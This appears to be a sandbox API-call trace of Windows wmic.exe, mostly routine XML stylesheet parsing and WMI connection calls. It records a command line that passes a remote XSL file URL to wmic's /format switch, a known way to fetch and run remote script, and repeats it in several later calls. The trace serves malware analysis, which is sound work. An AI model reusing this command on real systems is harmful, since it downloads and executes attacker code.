	[0111.028] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.029] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0
	[0111.029] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.029] SysStringLen (param_1="TABLE") returned 0x5
	[0111.029] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.029] SysStringLen (param_1="XML") returned 0x3
	[0111.029] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.029] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.029] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.029] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.029] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.029] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=12, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.029] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.029] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.029] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.029] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0
	[0111.029] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.029] SysStringLen (param_1="TABLE") returned 0x5
	[0111.029] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.029] SysStringLen (param_1="XML") returned 0x3
	[0111.029] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.029] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.029] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.029] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.030] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.030] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.030] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.030] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=13, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.030] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.030] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.030] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.030] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0
	[0111.030] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.030] SysStringLen (param_1="TABLE") returned 0x5
	[0111.030] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.030] SysStringLen (param_1="XML") returned 0x3
	[0111.030] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.030] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.030] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.030] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.030] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.030] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.030] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.030] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.030] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.030] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=14, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.031] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="texttable.xsl") returned 0x0
	[0111.031] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.031] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.031] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0111.031] SysStringLen (param_1="TABLE") returned 0x5
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0111.031] SysStringLen (param_1="XML") returned 0x3
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0111.031] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0111.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.031] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0111.031] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.031] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.031] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.031] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=15, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.031] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="htable.xsl") returned 0x0
	[0111.031] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.032] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.032] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0
	[0111.032] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0111.032] SysStringLen (param_1="TABLE") returned 0x5
	[0111.032] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0111.032] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.032] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0111.032] SysStringLen (param_1="XML") returned 0x3
	[0111.032] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0111.032] SysStringLen (param_1="texttablewsys") returned 0xd
	[0111.032] SysStringLen (param_1="XML") returned 0x3
	[0111.032] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0111.032] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.032] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.032] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.032] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=16, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.032] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="htable.xsl") returned 0x0
	[0111.032] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.032] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.032] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0
	[0111.033] SysStringLen (param_1="htable-sortby") returned 0xd
	[0111.033] SysStringLen (param_1="TABLE") returned 0x5
	[0111.033] SysStringLen (param_1="htable-sortby") returned 0xd
	[0111.033] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.033] SysStringLen (param_1="htable-sortby") returned 0xd
	[0111.033] SysStringLen (param_1="XML") returned 0x3
	[0111.033] SysStringLen (param_1="htable-sortby") returned 0xd
	[0111.033] SysStringLen (param_1="texttablewsys") returned 0xd
	[0111.033] SysStringLen (param_1="htable-sortby") returned 0xd
	[0111.033] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0111.033] SysStringLen (param_1="XML") returned 0x3
	[0111.033] SysStringLen (param_1="htable-sortby") returned 0xd
	[0111.033] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.033] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.033] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.033] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=17, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.033] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="mof.xsl") returned 0x0
	[0111.033] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.033] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.033] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0
	[0111.033] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0111.033] SysStringLen (param_1="TABLE") returned 0x5
	[0111.033] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0111.033] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.033] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0111.033] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.033] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0111.033] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.033] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.033] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0111.035] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.035] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.035] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.035] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=18, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.035] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="mof.xsl") returned 0x0
	[0111.035] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.035] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.035] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0
	[0111.035] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0111.035] SysStringLen (param_1="TABLE") returned 0x5
	[0111.035] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0111.035] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.035] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0111.035] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.035] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0111.035] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0111.035] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0111.035] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0111.036] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.036] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0111.036] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.036] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.036] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.036] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=19, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.036] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="textvaluelist.xsl") returned 0x0
	[0111.036] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.036] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.036] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0
	[0111.036] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0111.036] SysStringLen (param_1="TABLE") returned 0x5
	[0111.036] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0111.036] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.036] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0111.036] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.036] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0111.036] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.036] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.036] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0111.037] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.037] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.037] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.037] IXMLDOMNodeList:get_item (in: This=0x2ad207bca30, index=20, listItem=0xd7edd8f840 | out: listItem=0xd7edd8f840*=0x2ad207bd070) returned 0x0
	[0111.037] IXMLDOMNode:get_text (in: This=0x2ad207bd070, text=0xd7edd8f848 | out: text=0xd7edd8f848*="textvaluelist.xsl") returned 0x0
	[0111.037] IXMLDOMNode:get_attributes (in: This=0x2ad207bd070, attributeMap=0xd7edd8f850 | out: attributeMap=0xd7edd8f850*=0x2ad207b96d0) returned 0x0
	[0111.037] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ad207b96d0, name="KEYWORD", namedItem=0xd7edd8f858 | out: namedItem=0xd7edd8f858*=0x2ad207bd0e0) returned 0x0
	[0111.037] IXMLDOMNode:get_nodeValue (in: This=0x2ad207bd0e0, value=0xd7edd8f8a8 | out: value=0xd7edd8f8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0
	[0111.037] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0111.037] SysStringLen (param_1="TABLE") returned 0x5
	[0111.037] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0111.037] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0111.037] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0111.037] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0111.037] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0111.037] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.037] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0111.037] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0111.037] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0111.037] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0111.037] IUnknown:Release (This=0x2ad207bd070) returned 0x0
	[0111.037] IUnknown:Release (This=0x2ad207b96d0) returned 0x0
	[0111.038] IUnknown:Release (This=0x2ad207bd0e0) returned 0x0
	[0111.038] IUnknown:Release (This=0x2ad207bca30) returned 0x0
	[0111.038] IUnknown:Release (This=0x2ad207b94a0) returned 0x1
	[0111.038] FreeThreadedDOMDocument:IUnknown:Release (This=0x2ad207b6f20) returned 0x0
	[0111.038] GetCommandLineW () returned="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	[0111.038] memcpy_s (in: _Destination=0x2ad20878930, _DestinationSize=0x8e, _Source=0x2ad205d1a4c, _SourceSize=0x82 | out: _Destination=0x2ad20878930) returned 0x0
	[0111.038] GetLocalTime (in: lpSystemTime=0xd7edd8faa0 | out: lpSystemTime=0xd7edd8faa0*(wYear=0x7e2, wMonth=0x6, wDayOfWeek=0x2, wDay=0x1a, wHour=0x17, wMinute=0x0, wSecond=0x6, wMilliseconds=0x34d)) 
	[0111.038] _vsnwprintf (in: _Buffer=0x2ad208780e0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xd7edd8f948 | out: _Buffer="06-26-2018T23:00:06") returned 19
	[0111.038] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.038] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.038] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.038] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.038] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.038] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.039] lstrlenW (lpString="os") returned 2
	[0111.039] _wcsicmp (_String1="os", _String2="\"NULL\"") returned 77
	[0111.039] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.039] lstrlenW (lpString="get") returned 3
	[0111.039] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
	[0111.039] memmove_s (in: _Destination=0x2ad2087b6f0, _DestinationSize=0x8, _Source=0x2ad2087b8d0, _SourceSize=0x8 | out: _Destination=0x2ad2087b6f0) returned 0x0
	[0111.039] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.039] lstrlenW (lpString="/") returned 1
	[0111.039] memmove_s (in: _Destination=0x2ad2087b450, _DestinationSize=0x10, _Source=0x2ad2087b6f0, _SourceSize=0x10 | out: _Destination=0x2ad2087b450) returned 0x0
	[0111.039] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.039] lstrlenW (lpString="ASSOC") returned 5
	[0111.039] lstrlenW (lpString="format") returned 6
	[0111.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0111.039] lstrlenW (lpString="FORMAT") returned 6
	[0111.039] lstrlenW (lpString="format") returned 6
	[0111.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
	[0111.039] lstrlenW (lpString="/") returned 1
	[0111.039] lstrlenW (lpString="/") returned 1
	[0111.039] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
	[0111.039] lstrlenW (lpString="format") returned 6
	[0111.039] _wcsicmp (_String1="format", _String2="\"NULL\"") returned 68
	[0111.039] lstrlenW (lpString="format") returned 6
	[0111.039] memmove_s (in: _Destination=0x2ad2087b980, _DestinationSize=0x18, _Source=0x2ad2087b450, _SourceSize=0x18 | out: _Destination=0x2ad2087b980) returned 0x0
	[0111.039] memmove_s (in: _Destination=0x2ad208771e0, _DestinationSize=0x20, _Source=0x2ad2087b980, _SourceSize=0x20 | out: _Destination=0x2ad208771e0) returned 0x0
	[0111.039] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43
	[0111.039] _wcsicmp (_String1="\"https://itaxkenya.com/kra/tax_returns.xsl\"", _String2="\"NULL\"") returned -6
	[0111.039] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43
	[0111.039] lstrlenW (lpString="\"https://itaxkenya.com/kra/tax_returns.xsl\"") returned 43
	[0111.039] lstrlenW (lpString="  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ") returned 61
	[0111.040] lstrlenW (lpString="QUIT") returned 4
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="QUIT", cchCount2=4) returned 1
	[0111.040] lstrlenW (lpString="EXIT") returned 4
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="EXIT", cchCount2=4) returned 3
	[0111.040] WbemLocator:IUnknown:AddRef (This=0x2ad205e42f0) returned 0x2
	[0111.040] lstrlenW (lpString="/") returned 1
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="/", cchCount2=1) returned 3
	[0111.040] lstrlenW (lpString="-") returned 1
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="-", cchCount2=1) returned 3
	[0111.040] lstrlenW (lpString="CLASS") returned 5
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CLASS", cchCount2=5) returned 3
	[0111.040] lstrlenW (lpString="PATH") returned 4
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="PATH", cchCount2=4) returned 1
	[0111.040] lstrlenW (lpString="CONTEXT") returned 7
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CONTEXT", cchCount2=7) returned 3
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] lstrlenW (lpString="os") returned 2
	[0111.040] GetCurrentThreadId () returned 0x6bc
	[0111.040] ??0CHString@@QEAA@XZ () returned 0xd7edd8f800
	[0111.040] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ad205e42f0, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da898 | out: ppNamespace=0x7ff66e6da898*=0x2ad20637fc0) returned 0x0
	[0111.072] CoSetProxyBlanket (pProxy=0x2ad20637fc0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0111.072] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.072] GetCurrentThreadId () returned 0x6bc
	[0111.072] ??0CHString@@QEAA@XZ () returned 0xd7edd8f698
	[0111.072] SysStringLen (param_1="root\\cli") returned 0x8
	[0111.072] SysStringLen (param_1="\\") returned 0x1
	[0111.072] SysStringLen (param_1="root\\cli\\") returned 0x9
	[0111.072] SysStringLen (param_1="ms_409") returned 0x6
	[0111.073] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ad205e42f0, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x7ff66e6da8a0 | out: ppNamespace=0x7ff66e6da8a0*=0x2ad20654bc0) returned 0x0
	[0111.079] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0111.079] GetCurrentThreadId () returned 0x6bc
	[0111.079] ??0CHString@@QEAA@XZ () returned 0xd7edd8f818
	[0111.079] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
	[0111.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bdbc0, cbMultiByte=-1, lpWideCharStr=0x2ad2087b930, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
	[0111.079] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
	[0111.079] SysStringLen (param_1="os") returned 0x2
	[0111.079] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
	[0111.079] SysStringLen (param_1="'") returned 0x1
	[0111.079] IWbemServices:GetObject (in: This=0x2ad20637fc0, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0xd7edd8f730*=0x0, ppCallResult=0x0 | out: ppObject=0xd7edd8f730*=0x2ad206535c0, ppCallResult=0x0) returned 0x0
	[0111.087] IWbemClassObject:Get (in: This=0x2ad206535c0, wszName="Target", lFlags=0, pVal=0xd7edd8f748*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f748*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_OperatingSystem", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.087] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0111.087] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0111.087] IWbemClassObject:Get (in: This=0x2ad206535c0, wszName="PWhere", lFlags=0, pVal=0xd7edd8f748*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd7edd8f748*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0111.088] lstrlenW (lpString="") returned 0
	[0111.088] lstrlenW (lpString="") returned 0
